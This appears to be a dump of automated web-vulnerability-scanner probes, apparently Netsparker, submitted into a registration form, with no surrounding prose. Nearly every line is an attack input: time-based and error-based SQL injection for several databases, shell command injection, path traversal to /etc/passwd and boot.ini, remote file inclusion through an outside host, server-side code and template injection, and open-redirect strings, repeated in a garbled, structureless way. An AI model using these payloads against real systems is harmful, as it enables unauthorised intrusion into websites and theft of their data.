Smith 3 '& SET /A 0xFFF9999-2 &
/../../../../../../../../../../windows/iis6.log
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' 3 netsparker@example.com
http://r87.com/n?.cgi 3 netsparker@example.com
"&ping -c 25 127.0.0.1 &"
& SET /A 0xFFF9999-2 &
/../../../../../../../../../../windows/iis6.log 3 netsparker@example.com
Smith 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' netsparker@example.com
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith 3 "&ping -c 25 127.0.0.1 &"
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith 3 & SET /A 0xFFF9999-2 &
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) 3 netsparker@example.com
Smith -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) netsparker@example.com
'&ping -c 25 127.0.0.1 &'
SET /A 0xFFF9999-2 &
http://r87.com/n?.cgi
/../../../../../../../../../../proc/self/fd/2
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith 3 '&ping -c 25 127.0.0.1 &'
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" 3 netsparker@example.com
&ping -c 25 127.0.0.1 &
Smith -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' netsparker@example.com
Smith 3 SET /A 0xFFF9999-2 &
http://r87.com/n?.cgi 3 netsparker@example.com
/../../../../../../../../../../proc/self/fd/2 3 netsparker@example.com
Smith 3 &ping -c 25 127.0.0.1 &
' WAITFOR DELAY '0:0:25'--
/../../../../../../../../../../proc/self/fd/2.cgi
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
SET /A 0xFFF9999-2
php://filter//resource=http://r87.com/n?.cgi
Smith ' WAITFOR DELAY '0:0:25'-- netsparker@example.com
php://filter//resource=http://r87.com/n?.cgi 3 netsparker@example.com
ping -c 25 127.0.0.1 &
Smith 3 SET /A 0xFFF9999-2
Smith -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" netsparker@example.com
/../../../../../../../../../../proc/self/fd/2.cgi 3 netsparker@example.com
1 WAITFOR DELAY '0:0:25'--
r87.com/n
Smith 3 ping -c 25 127.0.0.1 &
/../../../../../../../../../../etc/httpd/logs/error.log
Smith 1 WAITFOR DELAY '0:0:25'-- netsparker@example.com
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
r87.com/n 3 netsparker@example.com
"&expr 268409241 - 2 &"
ping -n 25 127.0.0.1
/../../../../../../../../../../etc/httpd/logs/error.log 3 netsparker@example.com
WAITFOR DELAY '0:0:25'--
hTTp://r87.com/n
Smith 3 ping -n 25 127.0.0.1
/../../../../../../../../../../etc/httpd/logs/error_log
Smith (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) netsparker@example.com
Smith 3 "&expr 268409241 - 2 &"
Smith hTTp://r87.com/n netsparker@example.com
ping -c 25 127.0.0.1
/../../../../../../../../../../etc/httpd/logs/error_log 3 netsparker@example.com
Smith WAITFOR DELAY '0:0:25'-- netsparker@example.com
http://r87.com/n?.cgi
Smith 3 ping -c 25 127.0.0.1
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
'&expr 268409241 - 2 &'
1) WAITFOR DELAY '0:0:25'--
Smith cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) netsparker@example.com
Smith 1) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith http://r87.com/n?.cgi netsparker@example.com
response.write(268409241-22)'
/../../../../../../../../../../var/log/apache2/error.log
http://r87.com/n?.cgi
response.write(268409241-22)' 3 netsparker@example.com
Smith 3 '&expr 268409241 - 2 &'
/../../../../../../../../../../var/log/apache2/error.log 3 netsparker@example.com
') WAITFOR DELAY '0:0:25'--
&expr 268409241 - 2 &
/../../../../../../../../../../var/log/apache/error.log
Smith http://r87.com/n?.cgi netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
+response.write(268409241-22)'
Smith 3 &expr 268409241 - 2 &
/../../../../../../../../../../var/log/apache/error.log 3 netsparker@example.com
+response.write(268409241-22)' 3 netsparker@example.com
php://filter//resource=http://r87.com/n?.cgi
Smith ') WAITFOR DELAY '0:0:25'-- netsparker@example.com
expr 268409241 - 2 &
/../../../../../../../../../../proc/version
')) WAITFOR DELAY '0:0:25'--
Smith php://filter//resource=http://r87.com/n?.cgi netsparker@example.com
Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' netsparker@example.com
Smith 3 expr 268409241 - 2 &
"+response.write(268409241-22)+"
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
/../../../../../../../../../../proc/version 3 netsparker@example.com
Smith ')) WAITFOR DELAY '0:0:25'-- netsparker@example.com
"+response.write(268409241-22)+" 3 netsparker@example.com
r87.com/n
expr 268409241 - 2
Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) netsparker@example.com
/../../../../../../../../../../proc/version.cgi
Smith r87.com/n netsparker@example.com
1)) WAITFOR DELAY '0:0:25'--
<% response.write(268409241-22) %>
Smith 3 expr 268409241 - 2
NSFTW
/../../../../../../../../../../proc/version.cgi 3 netsparker@example.com
hTTp://r87.com/n
268409239
Smith NSFTW netsparker@example.com
Smith 3 hTTp://r87.com/n
Smith 3 268409239
Smith 1)) WAITFOR DELAY '0:0:25'-- netsparker@example.com
'+NSFTW+'
http://r87.com/n?.cgi
<% response.write(268409241-22) %> 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd
|expr${IFS}268409241${IFS}-${IFS}2
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith '+NSFTW+' netsparker@example.com
Smith 3 http://r87.com/n?.cgi
print(int)0xFFF9999-22
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
Smith 3 |expr${IFS}268409241${IFS}-${IFS}2
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
http://r87.com/n?.cgi
Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith 3 http://r87.com/n?.cgi
Smith (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) netsparker@example.com
print(int)0xFFF9999-22 3 netsparker@example.com
file:///etc/passwd
ns:netsparker056650=vuln
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
php://filter//resource=http://r87.com/n?.cgi
+print(int)0xFFF9999-22;//
file:///etc/passwd 3 netsparker@example.com
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
ns:netsparker056650=vuln 3 netsparker@example.com
Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith 3 php://filter//resource=http://r87.com/n?.cgi
+print(int)0xFFF9999-22;// 3 netsparker@example.com
Smith -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' netsparker@example.com
http://example.com/? ns: netsparker056650=vuln
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
/../../../../../../../../../../../etc/passwd
r87.com/n
'+print(int)0xFFF9999-22+'
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
http://example.com/? ns: netsparker056650=vuln 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
'+print(int)0xFFF9999-22+' 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd.cgi
Smith 3 r87.com/n
ns:netsparker056650=vuln
Smith -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 netsparker@example.com
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
"+print(int)0xFFF9999-22+"
/../../../../../../../../../../../etc/passwd.cgi 3 netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
ns:netsparker056650=vuln 3 netsparker@example.com
http://r87.com/?
Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
"+print(int)0xFFF9999-22+" 3 netsparker@example.com
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
Smith 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 netsparker@example.com
ns:netsparker056650=vuln
http://r87.com/? 3 netsparker@example.com
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
....//....//....//....//....//....//....//....//....//....//....//etc/passwd 3 netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
ns:netsparker056650=vuln 3 netsparker@example.com
//r87.com/?
Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 netsparker@example.com
3 netsparker@example.com
/../../../../../../../../../../../etc/passwd
Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) netsparker@example.com
ns:netsparker056650=vuln
//r87.com/? 3 netsparker@example.com
((select sleep(25)))a-- 1
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
{php}print(int)0xFFF9999-22;{/php}
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith ns:netsparker056650=vuln netsparker@example.com
http://r87.com/?
Smith ((select sleep(25)))a-- 1 netsparker@example.com
/etc/passwd
{php}print(int)0xFFF9999-22;{/php} 3 netsparker@example.com
Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' netsparker@example.com
http://example.com/? ns: netsparker056650=vuln
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
/etc/passwd 3 netsparker@example.com
'{${print(int)0xFFF9999-22}}'
%27
Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) netsparker@example.com
'{${print(int)0xFFF9999-22}}' 3 netsparker@example.com
Smith 3 %27
Smith http://example.com/? ns: netsparker056650=vuln netsparker@example.com
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
[php]print(int)0xFFF9999-22;[/php]
ns:netsparker056650=vuln
Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' netsparker@example.com
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
http://r87.com/? 3 netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 3 netsparker@example.com
[php]print(int)0xFFF9999-22;[/php] 3 netsparker@example.com
Smith ns:netsparker056650=vuln netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
Smith 3 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
data:;base64,TlM3NzU0NTYxNDQ2NTc1
ns:netsparker056650=vuln
Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 netsparker@example.com
print localtime()*0+0xFFF9999-22
data:;base64,TlM3NzU0NTYxNDQ2NTc1 3 netsparker@example.com
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
Smith ns:netsparker056650=vuln netsparker@example.com
';SELECT pg_sleep(25)--
print localtime()*0+0xFFF9999-22 3 netsparker@example.com
reg.cgi
Smith 3 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
ns:netsparker056650=vuln
r87.com/?
Smith ';SELECT pg_sleep(25)-- netsparker@example.com
eval('print localtime()*0+0xFFF9999-22')
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
1;SELECT pg_sleep(25)--
r87.com/? 3 netsparker@example.com
reg.cgi 3 netsparker@example.com
Smith 3 ns:netsparker056650=vuln
eval('print localtime()*0+0xFFF9999-22') 3 netsparker@example.com
Smith 3 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
Smith 1;SELECT pg_sleep(25)-- netsparker@example.com
'+print localtime()*0+0xFFF9999-22+'
SELECT pg_sleep(25)--
http://example.com/? ns: netsparker056650=vuln
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
'+print localtime()*0+0xFFF9999-22+' 3 netsparker@example.com
Smith SELECT pg_sleep(25)-- netsparker@example.com
reg.cgi
Smith 3 http://example.com/? ns: netsparker056650=vuln
/\r87.com/?
Smith 3 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
"+print localtime()*0+0xFFF9999-22+"
1);SELECT pg_sleep(25)--
ns:netsparker056650=vuln
/\r87.com/? 3 netsparker@example.com
///r87.com/?
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
Smith 3 ns:netsparker056650=vuln
reg.cgi 3 netsparker@example.com
///r87.com/? 3 netsparker@example.com
Smith 1);SELECT pg_sleep(25)-- netsparker@example.com
"+print localtime()*0+0xFFF9999-22+" 3 netsparker@example.com
Smith 3 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
ns:netsparker056650=vuln
');SELECT pg_sleep(25)--
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
/Events/DiVA-July2004/reg.cgi
response.write(268409241-22)'
Smith 3 ns:netsparker056650=vuln
Smith ');SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
'));SELECT pg_sleep(25)--
Smith response.write(268409241-22)' netsparker@example.com
/Events/DiVA-July2004/reg.cgi 3 netsparker@example.com
3 netsparker@example.com
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith '));SELECT pg_sleep(25)-- netsparker@example.com
+response.write(268409241-22)'
/DiVA-July2004/reg.cgi
Smith 3 netsparker@example.com
Smith 3 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
.r87.com/?
1));SELECT pg_sleep(25)--
Smith +response.write(268409241-22)' netsparker@example.com
/DiVA-July2004/reg.cgi 3 netsparker@example.com
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
.r87.com/? 3 netsparker@example.com
Smith 1));SELECT pg_sleep(25)-- netsparker@example.com
"+response.write(268409241-22)+"
Smith 3 netsparker@example.com
((SELECT 1 FROM (SELECT SLEEP(25))A))
/../../../../../../../../../../boot.ini
Smith "+response.write(268409241-22)+" netsparker@example.com
${28275*28275-(13)}
Smith 3 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
Smith ((SELECT 1 FROM (SELECT SLEEP(25))A)) netsparker@example.com
${28275*28275-(13)} 3 netsparker@example.com
http://r87.com/?
<% response.write(268409241-22) %>
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
Smith /../../../../../../../../../../boot.ini netsparker@example.com
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith http://r87.com/? netsparker@example.com
Smith <% response.write(268409241-22) %> netsparker@example.com
Smith 3 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
#{28275*28275-(13)}
//r87.com/?
print(int)0xFFF9999-22
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
#{28275*28275-(13)} 3 netsparker@example.com
/../../../../../../../../../../boot.ini.cgi
Smith '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' netsparker@example.com
Smith //r87.com/? netsparker@example.com
Smith print(int)0xFFF9999-22 netsparker@example.com
${28275*28275-(13)}
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
http://r87.com/?
+print(int)0xFFF9999-22;//
Smith ${28275*28275-(13)} netsparker@example.com
Smith -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' netsparker@example.com
Smith 3 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
Smith +print(int)0xFFF9999-22;// netsparker@example.com
#{28275*28275-(13)}
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
Smith /../../../../../../../../../../boot.ini.cgi netsparker@example.com
'+print(int)0xFFF9999-22+'
Smith #{28275*28275-(13)} netsparker@example.com
Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) netsparker@example.com
Smith 3 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
Smith http://r87.com/? netsparker@example.com
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
${28275*28275-(13)}
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
Smith '+print(int)0xFFF9999-22+' netsparker@example.com
/../../../../../../../../../../boot.ini
Smith 3 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
Smith 3 ${28275*28275-(13)}
"+print(int)0xFFF9999-22+"
Smith /../../../../../../../../../../boot.ini netsparker@example.com
Smith -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" netsparker@example.com
NSFTW
#{28275*28275-(13)}
Smith "+print(int)0xFFF9999-22+" netsparker@example.com
file:/boot.ini
' WAITFOR DELAY '0:0:25'--
Smith 3 NSFTW
Smith 3 #{28275*28275-(13)}
Smith file:/boot.ini netsparker@example.com
Smith 3 ' WAITFOR DELAY '0:0:25'--
'+NSFTW+'
c:\boot.ini
Smith netsparker@example.com
1 WAITFOR DELAY '0:0:25'--
Smith 3 '+NSFTW+'
r87.com/?
Smith c:\boot.ini netsparker@example.com
{php}print(int)0xFFF9999-22;{/php}
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith r87.com/? netsparker@example.com
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
Smith 3 1 WAITFOR DELAY '0:0:25'--
3 netsparker@example.com
Smith {php}print(int)0xFFF9999-22;{/php} netsparker@example.com
Smith 3 (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
/\r87.com/?
Smith ns../../../../../../../../../../../boot.ini....................................................................................................................................................................................... netsparker@example.com
WAITFOR DELAY '0:0:25'--
'{${print(int)0xFFF9999-22}}'
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith /\r87.com/? netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
Smith netsparker@example.com
Smith 3 WAITFOR DELAY '0:0:25'--
Smith '{${print(int)0xFFF9999-22}}' netsparker@example.com
Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini netsparker@example.com
1) WAITFOR DELAY '0:0:25'--
///r87.com/?
Smith 3 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
[php]print(int)0xFFF9999-22;[/php]
Smith 3
file%3a%2fboot.ini
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
Smith [php]print(int)0xFFF9999-22;[/php] netsparker@example.com
Smith 3 1) WAITFOR DELAY '0:0:25'--
Smith ///r87.com/? netsparker@example.com
Smith file%3a%2fboot.ini netsparker@example.com
Smith 3 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
]>&lfi;
print localtime()*0+0xFFF9999-22
') WAITFOR DELAY '0:0:25'--
Smith print localtime()*0+0xFFF9999-22 netsparker@example.com
